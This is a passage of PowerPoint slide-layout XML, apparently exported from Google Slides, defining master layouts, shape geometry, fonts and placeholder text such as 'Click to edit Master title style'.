                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698913" y="3017733"/>
            <a:ext cx="4534400" cy="175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Didact Gothic"/>
              <a:buNone/>
              <a:defRPr sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1"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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2391952423"/>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8">
  <p:cSld name="Title and text 8">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 155"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3130456"/>
            <a:ext cx="5478800" cy="1930000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-431789" rtl="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marL="1219170" lvl="1" indent="-397923" rtl="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marL="1828754" lvl="2" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="2438339" lvl="3" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3047924" lvl="4" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3657509" lvl="5" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4267093" lvl="6" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4876678" lvl="7" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="5486263" lvl="8" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="2028433"/>
            <a:ext cx="5478800" cy="70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4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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-1014683" y="-1054016"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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159" name="Google Shape;159;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-1141683" y="-1346116"/>
            <a:ext cx="4541200" cy="4403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160" name="Google Shape;160;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3862467" y="384000"/>
            <a:ext cx="13521600" cy="6090000"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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4047111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9">
  <p:cSld name="Title and text 9">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 161"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-3186800" y="-136633"/>
            <a:ext cx="18516000" cy="8763200"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 4985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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7015935" y="2060167"/>
            <a:ext cx="9380800" cy="4369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4" name="Google Shape;164;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245700" y="4177652"/>
            <a:ext cx="5700400" cy="641600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-431789" algn="ctr" rtl="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marL="1219170" lvl="1" indent="-397923" rtl="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marL="1828754" lvl="2" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="2438339" lvl="3" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3047924" lvl="4" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3657509" lvl="5" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4267093" lvl="6" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4876678" lvl="7" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="5486263" lvl="8" indent="-397923" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301600" y="2241933"/>
            <a:ext cx="7588800" cy="1748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10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9225833" y="-984167"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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167" name="Google Shape;167;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9416333" y="-1060367"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3290018940"/>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solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 168"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="9759233" y="4304400"/>
            <a:ext cx="2816800" cy="2731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0" name="Google Shape;170;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-692867" y="3182467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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171" name="Google Shape;171;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-984967" y="3309467"/>
            <a:ext cx="4541200" cy="44032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172" name="Google Shape;172;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8970433" y="-1220733"/>
            <a:ext cx="4541200" cy="44032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173" name="Google Shape;173;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-349967" y="-2519833"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:pr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174" name="Google Shape;174;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950968" y="2393917"/>
            <a:ext cx="4534400" cy="704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3000"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3506875"/>
            <a:ext cx="4534400" cy="56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1pPr>
            <a:lvl2pPr lvl="1" rtl="0">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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133632580"/>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1">
  <p:cSld name="Main point 1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6190588" y="-2231145"/>
            <a:ext cx="10246800" cy="9935200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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178" name="Google Shape;178;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="3788733" y="384067"/>
            <a:ext cx="13521600" cy="6090000"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000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9" name="Google Shape;179;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="2169533"/>
            <a:ext cx="6212400" cy="2530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8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180" name="Google Shape;180;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-454949" y="-1050849"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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181" name="Google Shape;181;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-581949" y="-1342949"/>
            <a:ext cx="4541200" cy="4403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182" name="Google Shape;182;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7211633" y="6015767"/>
            <a:ext cx="4611200" cy="2565200"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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4639420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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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1759432" y="2681500"/>
            <a:ext cx="2612400" cy="44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400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
